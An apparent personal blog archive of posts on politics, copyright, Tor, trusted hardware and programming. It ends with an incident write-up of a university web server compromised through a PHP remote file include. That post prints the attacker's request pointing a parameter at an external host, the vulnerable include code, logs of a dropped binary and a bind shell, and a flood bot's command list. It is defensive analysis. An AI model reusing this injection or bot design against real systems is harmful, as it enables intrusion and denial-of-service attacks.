    Now my Turing machine is executing this universe and I can half its speed and it makes no difference to the being in the universe; it doesn't perceive that anything is different. I can start doing lots of other calculations on the side and it still makes no difference so long as we calculate another iteration once in a while. So we can do anything in the middle and our life form is still happy, eating rice pudding.

    Now we start generating sequential CA universes. Ignore the ruleset, just set each cell to a bit from a huge counter, over the whole size of the (I assume finite) universe. In the process we will, at some point, generate the next iteration of our rice pudding monster. Thus we are still generating iterations, just doing other stuff in between, thus our conscious rice pudding monster is unaffected. Right?

    Now once we've generated every possible CA universe. What's left to do? You might think that the CA monster is now frozen. But what more could we do? We could calculate the `next' iteration of his universe, but it already exists in memory. Is the act of actually calculating magical? Or, in fact, is every possible conscious being `living' in our memory; their patterns finding themselves in the dust?

    In fact, every possible rule of physics exists now. Any rule based progression is already there. Time is an illusion caused by the existence of memory. At each step, the entire universe (including all of the rice pudding monster's memories) exist fully formed (as does every other universe). Why should it be surprised that whatever laws of physics it believes in are precisely correct to allow it's existence? When everything exists, nothing is surprising.

    (You should, of course, be putting yourself in the place of the rice pudding monster at the moment and wondering why you're so special that you're not just patterns in the dust.)

    A Better Warning System?

    From Wired:

    Wild animals seem to have escaped the Indian Ocean tsunami, adding weight to notions they possess a sixth sense for disasters, experts said Thursday.

    Sri Lankan wildlife officials have said the giant waves that killed over 24,000 people along the Indian Ocean island's coast seemingly missed wild beasts, with no dead animals found.

    We might not understand how it works, but we don't need to do so in order to be able to use it. Tag lots of animals living near the coast and track them by satellite (I'm sure such a system has already been developed for the study of migration patterns etc). When they all start to leave - do likewise.

    Tor actually works pretty...

    Tor actually works pretty well. Of course, this is before it has been really hit hard by any sort of user base (people are only just starting to run BitTorrent through it) but I'm typing this over a real-time mixnet, end-to-end encrypted with bidirectional public key authentication. Maybe there's something to this crypto malarkey after all :)

    Unfortunately this anonymity of Tor is far short of the real hard line systems as it has a central directory. Basically you trust Tor because you trust arma (Roger Dingledine). But maybe that's actually better because none of those other systems have actually taken off. Having hard line anonymity is no good if your user set is a couple of dozen people. I would hope for some improvements in the centralisation at some point but I'm happy with this as a starting point.

    Fundamentally with any real-time mixnet, global traffic analysis is going to get you (esp with interactive traffic like ssh connections). Global observers are quite rare, and those with the motivation to invest in the infrastructure required are rarer still, but they do exist.

    So a good article from th...

    So a good article from the LA Times on nootropic drugs, which was on Slashdot.

    That text mentions that most of these drugs are being developed as anti-Alzheimer's drugs because it's the only way in which to approach the regulators. There's still a very puritan streak in drugs regulation which says that drugs shouldn't seek to improve people, only to cure something that is wrong.

    The word `improve' is a slippery one in the last sentence - who decides what is an improvement? Simply put; people decide themselves. Millions take caffeine (in many forms) every day as a performance booster and this is legal, mostly because of tradition. No one claims that caffeine is benign. Symptoms of overuse and withdrawal are part of the common culture but, also, no one would suggest that caffeine needs banning (at least no one worth listening to).

    Drugs companies recognise that people do want to improve themselves and they would be very happy to make money by letting people do it. But since they aren't allowed to improve people, they have to create new diseases. So I confidently predict that Senile Brain-Disfunction (or something like it) will appear very soon as be the disease which nootropics can cure.

    The products will almost certainly be prescription only. Otherwise, it would mean admitting that people can take responsibility for their own lives and from there you start wondering why non-addictive psycotropics are illegal - and we can't have that. Yet, despite them being prescription only, I assume that people will get they just as easily as all the other prescription `only' drugs. As far as I'm concerned this is a good thing.

    I'm under no illusion that humans were created perfect and thus need no improvement. Caution is called for as we're playing with a very complex system which we don't really know much about, but not too much.

    So the theatre mentioned ...

    So the theatre mentioned in my previous post has had to cancel the run of the play due to health and safety concerns. What that actually means is that the police are unable to protect them from a mob of sick freaks.

    Welcome to the UK, where little free speech has little progressed since 1700.

    Can I suggest that anyone...

    Can I suggest that anyone in Birmingham heads over to the Repertory tonight and makes sure that tonight's performance is packed out?

    For those outside the UK, a number of Sikhs in Birmingham has decided that they can censor a play which they feel is `insulting' by physically attacking the theatre. The police were there in some force, but obviously not enough to do their job.

    This play is exactly what Blunkett was targeting with his offense of Inciting Religious Hatred. A Sikh on Radio4's Today this morning said that he thought as much, though thankfully realised that it would look bad if he said so. The BBC found an excellent corespondent to argue the opposite case in Dr Evan Harris (Lib Dem MP) which makes that Today clip very enjoyable.

    And today I understand that the police are having a meeting with both sides about it. I think they should be apologising for failing to defend the theatre (since the theatre isn't allowed to defend itself) and for not arresting anyone for criminal damage despite many officers being present at the time.

    I await tomorrow morning's news.

    (On the same topic, Channel 4 is supposed to have a good programme on Christmas Day called Who Wrote the Bible.)

    Well, the project which I...

    Well, the project which I was working on at Google has hit Slashdot. I hope that was planned

    (better link about it [1]. And one from BBC News)

    AdBlock

    Lots of good patent stuff today. The Becker-Posner blog has a couple of long texts on the state of patents in medicine. I'm not a big fan of patents in many spheres of the economy, but drug research patents are sensible. Of course, there are flaws, but I don't think the correct balance here is as far away from the current position as it is in, say, software patents.

    Which brings me neatly to the EU trying to get software patents in via the back door. The headline says it all: EU Council Presidency Schedules Software Patent Directive for Adoption at Fishery Meeting. MEPs have a tough enough time as it is trying to convince people (British people esp) that they matter. Tricks like this certainly don't help.

    And now, if your blood pressure is a little high after that, Jason Schultz has a nice text in Salon. Although comparing patents to ex-USSR nuclear weapons is possibly a little bit strong.

    Hmm. Maybe this paragraph would have been better placed before that Salon link. But if you use Firefox (and if you don't, what the hell are you thinking?) then you should try AdBlock. With some minimal configuration it works really well. Just right click the adverts on a few of your common pages (The Register is a good one) and they are a lot less mentally glaring.

    BBC Radio on your iPod

    Google, very nicely, sent me a 20GB iPod for my birthday so I thought I had better do something useful with it.

    I have a fairly nice system at home for music so I spend the, otherwise wasted, walk to and from Imperial listening to Radio 4.

    You can select the `Listen' link on the website and get their web-based player. Right click and view source. Find ".ram" to pickout the filename URL. Then run lynx -source URL to get the rstp:// link.

    Here's the trick...

    % mplayer --version
    MPlayer 1.0pre5-3.4.2 (C) 2000-2004 MPlayer Team
    % mplayer -aofile showname-ddmmyy.wav -ao pcm -cache 320 rstp://...
    .
    .
    .
    % lame -h showname-ddmmyy.wav showname-ddmmyy.mp3

    Then use gtkpod to upload to the iPod.

    Submitted to Felix in rep...

    Submitted to Felix in reply to this, which appeared last Thursday.

    (for any Americans reading this; you probably don't know what a student Union is - don't worry.)

    Jamie Brothwell seems very keen that we should all buy fair trade products, to that point of creating a bureaucracy to check that we do. I'm perfectly happy for him to pay any price that the suppliers and growers agree to, including one which is above the market value. But before there is a "campaign for increased consumption of Fairtrade goods" (funded by our infinitely-bounteous Union I suppose) people should be aware of the problems of Fairtrade.

    When buying Fairtrade coffee you are charitably giving to certain selected groups of producers. Selected, that is, by the Fair Labeling Organisation which charges $2431 + $607/year + $1 per 110 pounds of coffee sold to be certified as a Fair Trade producer. And if you're a small producer (that is, less than 44,000 pounds of coffee per year - $55,440 per year, by FairTrade base prices) then I'm afraid that the FLO "seldom" certifies groups so small [Simen Sandberg, quoted in The Christian Science Monitor, April 13th]

    The problem with the primary FairTrade produce, coffee, is that too much of it is being produced worldwide. In Brazil and Columbia, producers were encouraged to switch from cocaine to coffee. In an effect to rebuild Vietnam, aid went into setting up coffee plantations so that the farmers could be self-sufficient. This lead to over-supply of coffee.

    The average coffee production per year increased 28% from 1990 to 2002 [ICO figures], but the values jump wildly - not the sign of a stable market. All this over-supply, of course, caused the price to drop and the less efficient producers to suffer. The inefficient producers in this case were the small, primitive farmers which Fair Trade is supposed to help.

    This gives the efficient producers less incentive to cut costs and keeps those farmers forever at the mercy of the charity of those who buy FairTrade and of the FLO, which soon gains the power to select who will and who won't survive.

    Instead of this perhaps Jamie should we lobbying for the elimination of EU subsidies such as the Common Agricultural Policy. (Though not through the Union of course, because everyone agree that the Union should limit itself to those issues which affect students as students, don't they?)

    The idiotitic effects of the CAP have entered into common usage; "butter mountains", "wine lakes" etc. In 2001, 7m tonnes of sugar was exported [Oxfam, 2002] from the EU, and the EU taxpayer paid a total of $2.1 billion to subsidise this dumping on the world markets.

    The development of internal trade (esp within Africa) and the cessation of dumping under-priced goods on the world market is the way to help these farmers. Hitching them to our charity, which is supported only by the publics' wondering attention, is not.

    I've said it before, and ...

    I've said it before, and I'll say it again. Greg Egan is the best sci-fi writer on the planet: Axoimatic

    Currently reading: System of the World.

    Next up after that: Obedience to Authority.

    The remains of a Stage Sc...

    The remains of a Stage Scan.

    Heading home of the coach...

    Heading home of the coach to Cheltenham last Friday (something that I do when I'm in need of a decent meal for a few days) I was stuck in a traffic jam for about 30 minutes. Annoying, but it's fairly small fry on a 3 hour journey. The time passed quickly enough with my special Google branded iPod :).

    But it turned out that the accident happened on one lane of the carriageway running in the opposite direction. The tailback which I was caught in was just the product of people slowing down to take a look. That tendency in the cellular automata of most traffic flows caused a huge tail back. Now there's a tendency to ignore such effects because they're somehow `stupid' but they are perfectly real. So can I suggest that the highway police carry large, self-standing black banners to hide the site of an accident to avoid traffic jams in future please.

    And so it begins on the d...

    And so it begins on the day of the Queen's Speech:

    Daily Mail: Al Qaeda attack on Canary Wharf foiled. And it seems that ITV copied the story, but didn't mention the Mail.

    The bits of Whitehall which weren't involved with leaking the story are confused and are denying it. But the bits which were are over the moon.

    Well, only a few months l...

    Well, only a few months late but I finally have my Yosemite photos up.

    I swear that "Yosemite" should have an accent - Yosemité maybe? (It's pronounced 'Yo-sam-i-tee')

    We have the Queen's Speec...

    We have the Queen's Speech on Tuesday. For the non-British; this is where the government announces the legislation that they propose for the next session of parliament. The the next session will be the last before the general election.

    It's disconcerting how fast the tone in this country has changed recently for the worse. We've had a lot of it on simmer for a while now I guess, but it's been kept down. Now the Linda Snells have really boiled over.

    As a final act, parliament passed the bill outlawing fox hunting - a bunch of deluded authoritarian crap dreamt up by people who probably drive out to the country and full expect to bump into the Famous Five. With a bit of luck it will kill the governments support in rural areas. With a lot more luck they won't switch to Tory.

    Now MPs have decided to turn their attention to overeating, smoking and drinking. All pleasures that MPs have famously overindulged in. Drinking will be linked with a large number of `law and order' bills no doubt. Overeating will probably come in the guise of a ban on advertising (some) foods.

    Nothing stirs people up like fear and Labour are running short on it. That's what the Queens speech is going to do. Fear of crime, fear of terror, a little fear for everybody and One Government to save them all. I expect Blunkett will be jerking off listening to it. (And that's something else that will probably be in - ID cards).

    And, frankly, there's no chance of stopping any of it. The Conservatives are hopeless and couldn't put up an opposition even if they disagreed with it. The Lib Dems aren't strong enough to even slow it down.

    Ah, crap.

    Writing on Wikipedia for ...

    Writing on Wikipedia for a change, because it will probably be more helpful to the world at large there.

    Wikipedia is missing a big chunk of CS stuff around the page that I wrote. If you know about Tornado codes or Digital Fountains etc, go fill it in! (and save me the trouble )

    On another note...

    US version of free speech; Fearful TV fails Private Ryan.

    So now one cannot show Saving Private Ryan on US TV because of fear of the FCC? A film which won five Oscars and one which my GCSE history teacher made sure that we saw the first ten minutes of because he thought that it was such a great depiction of WWII.

    Stations are free to broadcast what they choose and guess what? If you don't want to watch it you don't have to. You could get a book (I recommend The Confusion, which is much better than the first one). But your government is now dictating what you can watch with vague threats:

    After the FCC refused to guarantee stations they could broadcast the film without fear of repercussion, network executives said they were taking no chances.

    "We're just coming off an election where moral issues were cited as a reason by people voting one way or another and, in my opinion, the commissioners are fearful of the new congress," he said.

    I can understand why the covers of books for UK and US versions differ. You have to mess up the spelling for the US version at least. But why does the US get such poor cover art?

    Terry Pratchett covers are famous here (UK). But the US version is just poor.

    Again, the US version of The Confusion is trash compared to the UK one. Though the US version does have miscut pages to make the book seem old - that's kind of neat.

    Bait and Forget

    Those of us who like arguments and actually seek to get somewhere with them (as opposed to those who like them for their own sake) generally pay attention to lists of logically falacies. Like those 'proofs' that 1=0, fallacies seem reasonably correct but are actually fundamentally flawed and cause one to end up somewhere stupid.

    Take, for example, this page, which says the following:

    • Event X has occurred (or will or might occur).
    • Therefore event Y will inevitably happen.
    This sort of "reasoning" is fallacious because there is no reason to believe that one event must inevitably follow from another without an argument for such a claim. This is especially clear in cases in which there is a significant number of steps or gradations between one event and another.

    Now, I don't disagree with any of that. But here's a meta fallacy - a fallacy which those who quote fallacies fall into:

    As an example, on that same page, they give this: "We've got to stop them from banning pornography. Once they start banning one form of literature, they will never stop. Next thing you know, they will be burning all the books!"

    There's hyperbola for effect in that, but it's not completly daft. I see this pattern popping up a number of times. Take today's great post on BoingBoing about brands. Cory speaks about how trademark law was introduced for all manner of good reasons, but people have forgetten about them and now trademark law is an axiom in of itself and it getting abused.

    Copyright law was introduced as a very limited trade between the public (represented by the state) and private enties to introduce a government subsiby for the arts which was distributed by a pseudo-market. But that has been been the victim of bait-and-forget. People don't remember why copyright law exists, so we have the very counterproductive system which we have now, within which "copyright must be enforced" is all the reasoning that is required from its benifactors. This is also, soon, going to lead to the extension of copyright of music in the EU because noone in power can remember why, exactly, copyright was ever for a limited time in the first place.

    So, the meta-fallacy can roughly be put: "It's not slippery slope - but if we do this thing, X, which is reasonable at the moment then everyone will forget why we did it and it will lead to bad things."

    Pumpkins!

    The front of my flat :)

    Thanks flatmates

    Thanks flatmates :)

    XPath in Mozilla

    There really should be better documentation for this sort of thing. Maybe there is, but Google doesn't find it very well. Anyway...

    var result = xmldocument.evaluate(xpath query, 
      xpath root element,
      null, XPathResult.UNORDERED_NODE_SNAPSHOT_TYPE, null);

    The xmldocument seems to be able to be any such DOM object - it doesn't have to be connected with the root element so it could, for example, be document. Note that a general Node object wont do - they don't have an evaluate method.

    Then the result object has a property snapshotLength giving the number of results and a given result Node object can be obtained by calling snapshotItem(i).

    Replacements for Copyright

    (In-Reply-To: http://locut.us/~ian/blog/archives/26-Alternatives-to-Copyright-FairShare.html)

    So there are a number of different proposals for replacing copyright as a model for funding creative artists (or whatever you wish to call them). Some of them I cringe at, generally they propose a government authority which decides what is `art' and dishes out money to it. Much like a lot of direct government funding of the arts does today. I think I'm cringing in the same way that Ian does at such an idea; I mean 'government', 'art', 'committee' - doesn't it make you cringe? It's almost as bad as 'government', 'NHS', 'national IT project' - but that one actually makes me sick; different story.

    So there are also less cringe-worthy proposals such as Fairshare. These are usually based on a market, or at least a model of interacting, self-interested parties. But many people of a certain persuasion hear the word property in `intellectual property' and light up. I think the word association goes something like 'property' → 'no government needed' → 'good'. As far as I can see it's that simple.

    I keep hitting these people and they really should know better. Let's look at the difference between the government giving out grants and the current copyright system. In the former we are all forced to give up something (money, via taxes) and this is distributed to others via a process (arts boards, funds etc). In the latter we are all forced to give up something (our right to copy freely) and this is distributed to others (copyright holders). This does lead the actually money being distributed via a market system as opposed to government committee, which is a fairly neat hack, but it has ceased to work.

    Ponder what would happen if everyone on Earth suddenly had the ability to duplicate physical objects. You could go to a dinner party, really like the wallpaper and, with a click of the fingers, have it in your own house. I would bet that everyone would, within a week, be required to register and have all their fingers broken. Because it preserves the market, right? And markets are good, even when they're a bastard warping of reality caused by the mass of government distorting space-time around it, right?

    (In-Reply-To: http://locut.us/~ian/blog/archives/15-An-alternative-to-Senator-Boxer-for-California-Democrats.html)

    So one may very well have issues with voting for a libertarian in California given that they can get a little divergent and unhinged in places. But you don't have to agree with the aims of a person to vote for them. Very few Senators are actually going to have a huge impact on the world. One can vote for someone in order to steer the region towards those goals even if one would stop short of agreeing with them. It's also reasonable to interpolate between governments in successive elections.

    So I'm now doing UNIX cap...

    So I'm now doing UNIX capability systems as a degree project. It was almost managing petabytes but that one lost out for a number of reasons. Progress wasn't bad until the group project started and that has now taken all my time.

    In other news. I'm now going to be working for Google full-time come July. At first probably in Zürich and then back to Mt. View. :)

    Photos of Yosemite are sitting on the server now, I just need to get round to thumbnailing them which will hopefully be fairly soon.

    Upgrade your CVS copies of Stackless if you have one. I fixed a bug which was biting me in the course of working the capability project.

    Google have a new paper out on MapReduce. Another thing I can now talk about!

    So IBM now have a laptop ...

    So IBM now have a laptop with a fingerprint scanner built in. So, what is this meant to protect beyond passwords? Let's consider the attack cases:

    1. Someone steals the laptop because you left it somewhere stupid like the pub (let's call this the MI5 case)
    2. Someone is playing with the laptop while you're away for a moment
    3. Someone targets the laptop because because they want the data on it

    And a few facts from the piece:

    • You can setup the scan at boot time and that's enough to login and load the encryption key
    • It suggests that the scanner itself stores the fingerprint hashes

    Also remember that fingerprints are only secure if you trust the reader and nearly all readers suck. It's very difficult for a fingerprint scanner to tell the difference between a real finger and something which looks just like it, but isn't attached to a person.

    In case 1 the attacker knows nothing about you. If you care enough about your data to `encrypt' the hard drive (because, if you don't, they can lift the contents of the disk anyway) they are probably stuffed. A reasonable passphrase is probably enough to stop them as they are mostly after the hardware itself to sell on.

    Now, if it has a fingerprint scanner the laptop is probably less secure because the owner's fingerprints are going to be on the laptop or something in the same case. The effort required to break a passphrase is measurable. The effort required with a fingerprint is constant and small if you have the fingerprint in question.

    In the second case (assuming that you didn't leave it logged in), there's little chance that someone is going to brute force a passphrase manually. But they could lift a fingerprint and come back next day with a fake made up. Again, you're probably better off with a passphrase.

    In the third case you're certainly better off with a passphrase. Since the encryption keys are stored in the hardware in the case of fingerprint security (and laptop hardware isn't very tamper resistant) a break is probably easy for a well equipped group. In the case of a passphrase they either brute force it, or have to install a logger, get it back to you and steal it again. Not impossible, but harder.

    So the fingerprint scanner may be neat - but I wouldn't use it on its own.

    POSIX 1e ACLs are all ver...

    POSIX 1e ACLs are all very wonderful and so and the big reason that they're wonderful is that you can specify default ACLs which say something like "every file created in this directory should be writable by group foo" That is, until the user creates them with a umask of 022 and the write permission is masked away.

    I'm sure that POSIX had a good reason for this somewhere, but umask has never worked very well anyway. So here's a utility which fixes up files which were created with a bad umask. Run it like this

    find path -print0 | xargs -0 acldeletemask

    Schneier's Essay

    So, as Oskar at least has noticed, comments have been removed from this site. This is for two reasons: few people used them - they mostly emailed me anyway; I switched to a new server and couldn't be bothered to setup comments.

    But Oskar wanted to take me up on a few points. I'm not posting his email here because it wasn't a public and I haven't asked him.

    I linked to an essay a while back about car license plates. The reason I did this is because I thought it put across a good point that ease of access makes a fundamental difference. Often it's suggested that since cars have "always" has license plates, then the introduction of cameras which can log every car isn't a fundamental change.

    For most of the time that ID plates have been in operation there has been a cost to looking them up. That cost was in the time it took to do it. Thus there was a fairly inflexible limit to the rate of queries and they didn't have to ban anything because there were no technologies that could do it quicker.

    But that cost has now disappeared and reducing the cost of anything to zero usually results in a big effect. We could impose a query limit on the central computer somewhere - but we all know that would be ignored for 'national security' and they could get traffic analysis anyway.

    Maybe now the old system (of limited lookups) is impossible we shouldn't have license plates (and maybe we should never have had them), but I don't believe that we'll ever get that freedom back.

    Kosovo

    Next up, my linking to this Guardian text.

    Now, I'm sure that many writers for the Guardian would be very upset at the thought of an unregulated market. All that uncertainty, all that rope to hang oneself with. Much better to have some government take care of all that for me, right? Not as far as I'm concerned and Oskar suggests this report which shows the link between uninterfered markets and their success.

    But Kosovo and Iraq aren't examples of corrupt backwards governments being knocked over for the good of the people. The assets of the state are being stolen by force. The people of those countries were forced to buy these `public' enterprises for the state or to give their labour to them - misguided and inefficient as they may have been. That was the first theft and that should be righted as much as possible by giving the people ownership of them. If they then choose to sell to someone else that's their business.

    But, unsurprisingly, what's happening is that these assets are being sold off to outside groups with the proceeds disappearing into the mists of government. The spoils of war, right?

    RPOW

    Just to make it clear - I don't think that RPOW is going anywhere practically. A currency backed by a non-scarce resource isn't going to work. Worse yet, Moore's Law suggests an inflation rate of about 160% per year, right? :)

    PEP 334

    (background reading: PEP 334)

    Can you believe that I'm still going on about async IO programming? Well if someone would get it right I could shutup :)

    My current framework du jour is one I did myself based on Stackless. Yes, I've played with Twisted a lot, and I'm not a huge fan. For one, the core itself isn't 1.0 standard (the reactors still have stupid bugs where they listen on closed sockets and short circuit) and the http code is unusable in a hostile environment.

    Stackless provides user-land threads and my framework is pretty standard. The main problems are that having to patch the python interpreter is a pain and there are a few parts of Stackless that I don't quite understand - mostly because the documentation isn't there.

    PEP 332 promises some of same things as stackless - but in the standard CPython. Let's look at a Python generator:

    def gen():
        a = 1
        yield a
        yield 2

    This function returns multiple values and keeps state between invocations. The ability to keep state is very similar to user-land threads and one can easily imagine a generator which yields values from a socket. However, when the operation blocks the generator would have to yield a out-of-band value to denote this. Every use of the socket generator would then have to handle this - dragging the code quickly into the realm of the unreadable and unwritable.

    This issue is very similar to error handling and we have a way to cope with this - exceptions. So the idea of PEP 334 is to allow generators to raise a SuspendIteration exception without destroying themselves. (At the moment, once a generator has raised an exception it is finished.) The SuspendIteration would carry a payload of the objects which it is blocking on.

    The top of the call chain would be the IO core which would call each top-level suspended iterator (which would call others etc) until it hit a blocking IO operation and raised SuspendIteration. This would run back up the call chain and the IO core would make note of which objects (sockets etc) which that generator is blocking on. Later if those objects become ready the generator can be called again and allowed to progress.

    So the first issue is that there's no way to poke an exception into the bottom of a generator. (The ability to poke a TimedOut exception is very useful.) But, so long as all the blocking objects (wrappers around sockets, Channels, Mutexes etc) pay attention to a global variable they could be made to raise a given exception.

    Thus I cheer PEP 334 onwards because it could lead to a nice IO framework that works in all the pythons without patching.

    So, I'm done. And I cunni...

    So, I'm done. And I cunningly left before anything major that I wrote was used in anger :)

    Just random things: TiddlyWiki is very cool. Mix in a little WebDAV and XMLHttpRequest and it would be really useful.

    Good essay from Mr Schneier again.

    The Hitchhiker episode went out and I quite liked it. I perfer the old Book and I don't think the script is quite as sharp this time (but how could it be?) - but I like it. I've written code to record RealPlayer to OGG, but it's a pain to use and I don't I have it on my laptop. Maybe I'll be able to record next week's

    Another series that I wish I had recorded (still going) is Mr Hardy's current work. Probably the best thing on radio at the moment.

    Long time - no post. And ...

    Long time - no post. And even now it's not going to be very long.

    It's my last week at Google and it's going to be a very busy one. Of course, I can't say what I'm doing but maybe one day it will be public and I can point.

    But more importantly - and I'm sure that readers will know this, but - the new Hitchhikers series starts today in about 11 hours. This is not optional. If you don't listen to this people will be spitting at you on the street tomorrow. Well, may not, but I happen to think that you should listen. In years gone by I could (with a little prompting) receit most of the original radio series.

    So, you have your mission for the day and while you're waiting maybe you should read this. With the `second war' starting in Iraq (e.g. they've run out of space under the carpet) and all. Freeing people sure seems to cost of lot of money and lives.

    Google misinformation

    Slashdot: Google has now taken it one step further and created a word-identification script filter as part of the login process.. Let's clear this up no they haven't.

    I can only assume that what this person is seeing is the anti-bruteforce measures which only kick in when you trigger an alarm that a script is trying to brute force your password. Good luck finding anyone on /. who has actually checked the publically accessable frontpage to see that the story is crap.

    Switched servers. This is...

    Switched servers. This is more a message for me so that I know which server I'm looking at!

    New photos up...

    New photos up

    A little while back all t...

    A little while back all the talk was of Palladium and how `trusted hardware' was going to bring forth an end to general purpose computing. (I'm not ridiculing that notion - it may happen, though I think it's less likely now.) I remember being in a hotel in Guildford at the time so I guess that was summer 2002.

    People were horrified at this prospect and never have so many people linked to a A Right To Read in such a short span of time. But I was arguing something different at the time:

    Just because TCPAv1
    *may* be a stepping stone towards something bad doesn't automatically make
    TCPAv1 bad. As Hal and I have pointed out, TCPAv1 has a number of interesting
    uses and I, for one, will not be asking people to boycot it.

    Now, I don't pretend that anyone gave two hoots about what I thought once Hal popped up. But this is a kind of "told you so" link because Hal has now gone and proven that there is a use to this stuff with RPOW.

    Normally POW tokens can't be reused because that would allow them to be double-spent. But RPOW allows for a limited form of reuse: sequential reuse. This lets a POW token be used once, then exchanged for a new one, which can again be used once, then once more exchanged, etc. This approach makes POW tokens more practical for many purposes and allows the effective cost of a POW token to be raised while still allowing systems to use them effectively.

    I'm not yet convinced that RPOW is actually very useful, but that isn't the point. The point is that I have a strong chain of trust that Hal's server does what he says it does. It's running on an IBM 4758 and IBM publishes the root key for that in lots of places, including every printed manual. That keys signs the onboard key of the 4758 and the 4758 signs that code that it's running. I have a decent amount of trust in IBM because they are certified by NIST and they sell lots of these to the banking sector - so they have a strong financial interest in keeping things above board.

    This is a fundamentally different primitive to those which we are used to dealing with. Usually we need either reputation systems, trusted third parties or verifiable proofs of correctness (very rare). In a sense IBM here is a trusted third party but they are one level removed; we aren't trusting them to implement some protocol, but to make devices which can be configured to implement the protocol. There's a saying that every problem in computer science can be solved by implementing another layer of abstraction so we should be pretty excited about what this new layer gives us.

    Of course, it's not some magic bullet. Not very many people have 4758's they aren't going to become standard anytime soon. Also, they are pretty slow. But can do a number of things which I couldn't do before:

    I could implement a notary public and people would have a strong trust that it functioned correctly without knowing anything about me. I can do stuff like Hal's RPOW (or a number of financial things) and people could verify that I wasn't doing anything untoward etc. I'm sure that more ideas will pop up now that this is in our collective mental toolkit.

    How this relates to TCPA:

    Now, TCPA also includes remote attestation (the ability to sign the running code) but I feel that this is almost completely useless. For a start there will probably be a number of producers of TCPA chips and this dilutes the trust quite a lot already. Secondly, TCPA chips aren't going to be nearly so hard to subvert as a 4758. The 4758 isn't perfect (no tamper-resistance is), but FIPS level 4 says it's pretty good. Thirdly, it's utterly pointless for the TCPA to sign a Linux or NT kernel image; the trust flowing through either of those to a given running application (assuming that they had been modified so that they could sign the code that they were running) is tiny. At best, the application would have to implemented as a very stripped down kernel - making the box useless for anything else.

    But TCPA does have sealing (the ability to encrypt data keyed by the fingerprint of the running kernel). the first two points above still apply, but what I want this for to is to storing the encryption key for the hard drive so that it cannot be removed and inspected on another computer (or booted with another kernel from a floppy etc).

    So I still think that TCPA has a place … but not remote attestation.

    Heeps cracked

    Seeing an email titled "UMMMM.... BAD BAD THINGS ON HEEPS" isn't the best start to a day. In fact, I would go as far as to say that it sucks.

    So heeps is heeps.union.ic.ac.uk, also known as www.union.ic.ac.uk and a whole lot of other hosts. the email from Sam:

    sjs298@heeps music $ sudo ps aux | grep pra
    Password:
    www_soc  12644  0.0  0.0  1420  236 ?        S    Jul21   0:00 ./pra
    sjs298@heeps music $ sudo netstat -ap | grep pra
    tcp        0      0 *:18383                 *:*                     LISTEN      12644/pra          
    sjs298@heeps music $ telnet localhost 18383    
    Trying 127.0.0.1...
    Connected to localhost.
    Escape character is '^]'.
     
    sh-2.05b$ whoami
    whoami
    www_soc_medic_music
    sh-2.05b$
    
    Now I'd class that as a Hack... probably via PHPBB.
    /www/doc_root/medic/music/forums < PHPBB 2.0.4

    Certainly phpBB has been a pain in the past and this is why all php scripts run as a special, per group, user on heeps. But ok, not a huge deal. Security measures had worked, they didn't seem to have root and there were all manner of limits in place.

    We also have great logging:

    Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /bin/bash (sh
    -c /tmp/dsadas;rm -f /tmp/dsadas ) by (php:26669) UID(9113)
    EUID(9113), parent (php:30434) UID(9113) EUID(9113)
    Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /tmp/dsadas
    (/tmp/dsadas ) by (sh:4796) UID(9113) EUID(9113), parent (sh:26669)
    UID(9113) EUID(9113)
    Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of
    /tmp/upxDC5HNIQAEV2 (deleted) (/tmp/dsadas ) by (dsadas:4796)
    UID(9113) EUID(9113), parent (sh:26669) UID(9113) EUID(9113)
    Aug 12 23:13:15 heeps grsec: From 65.102.167.50: exec of /bin/rm (rm
    -f /tmp/dsadas ) by (sh:9657) UID(9113) EUID(9113), parent (sh:26669)
    UID(9113) EUID(9113)

    Fairly standard. Unfortunately we didn't have the binary (it was deleted) and it was killed before we remembered to grab it out of /proc.

    Looking in the logs:

    www.union.ic.ac.uk 65.102.167.50 - - [12/Aug/2004:23:13:15 +0100] "GET
    /medic/music/index.php?id=http://65.102.167.50:113/&width=http://65.102.167.50:113/
    HTTP/1.0" 200 48920 "-" "Lynx/2.8.3dev.8 libwww-FM/2.14"

    So it wasn't phpBB. There's a first. (nb: I'm sure that recent versions of phpBB are wonderfully quickly patched etc, but most of our users can't be bothered to keep track of recent versions.) The code at fault was fairly obvious:

    if ($_GET['eventreview']) { @include "8.php" ; $id="8.php"; } elseif ($event)
    {@include "2.php"; $id="2.php";} elseif  (!$id) { @include "1.php";
    $id="1.php" ; } else { include "$id"; } ;

    It include'ed a user controled string and someone just pointed it at an external webserver. Boilerplate.

    Further information in the logs showed that most of the server had been crawled a few days beforehand. Any URLs with parameters in them were tried again while replacing the parameter value with an external php file which ran id or uname -a. Looks like an automated crawled designed to find scripts with these holes. This crawl was comming from a number of different hosts, using a number of different external values.

    Ok, fine. Email the owner of the source IP address (probably a compromised box), disable the offending code, email the owner of said code. Easy. Done.

    Sam collected together some random files owned by the compromised account in /tmp. Of these, there was a binary called moo. Strings suggests that it's an IRC controlled flood bot:

    NOTICE %s :TSUNAMI <target> <secs>                          = Special packeter that wont be blocked by most firewalls
    NOTICE %s :PAN <target> <port> <secs>                       = An advanced syn flooder that will kill most network drivers
    NOTICE %s :UDP <target> <port> <secs>                       = A udp flooder
    NOTICE %s :UNKNOWN <target> <secs>                          = Another non-spoof udp flooder
    NOTICE %s :NICK <nick>                                      = Changes the nick of the client
    NOTICE %s :SERVER <server>                                  = Changes servers
    NOTICE %s :GETSPOOFS                                        = Gets the current spoofing
    NOTICE %s :SPOOFS <subnet>                                  = Changes spoofing to a subnet
    

    Ok, semi interesting. A few hours later (I am supposed to do some work at Google sometimes!) I came back to check around. Everything looks ok, though ifconfig is showing a lot of traffic. lsof -i -n … oh crap

    moo processes - flooding some poor bastard. (Did I say that heeps is on a 100Mb/s link to the Internet?).

    Panic. Kill them. Shutdown apache, vsftpd, everything. Move sshd onto a different port. Does ps auxw show anything odd? Nope. lsof or netstat? Nope. Packet counts? Epsilon. Root compromise? Possible; but ps auxw showed the moo processes - if that's a rootkit it sucks.

    Look in the logs:

    Aug 13 16:03:50 heeps grsec: From 155.198.78.202: exec of /tmp/moo (./moo ) by
    (bash:14746) UID(1246) EUID(1246), parent (bash:17808) UID(1246) EUID(1246)

    So the flooder process had been running for about six hours. No - I'm not even going to work out how much data you can push down a 100Mb/s link in six hours. UID 1246? That's Sam. Did he accidently run the damm payload? Is the box rooted? Fundamentally, does moo do anything more than strings suggests? I need to know exactly what moo does.

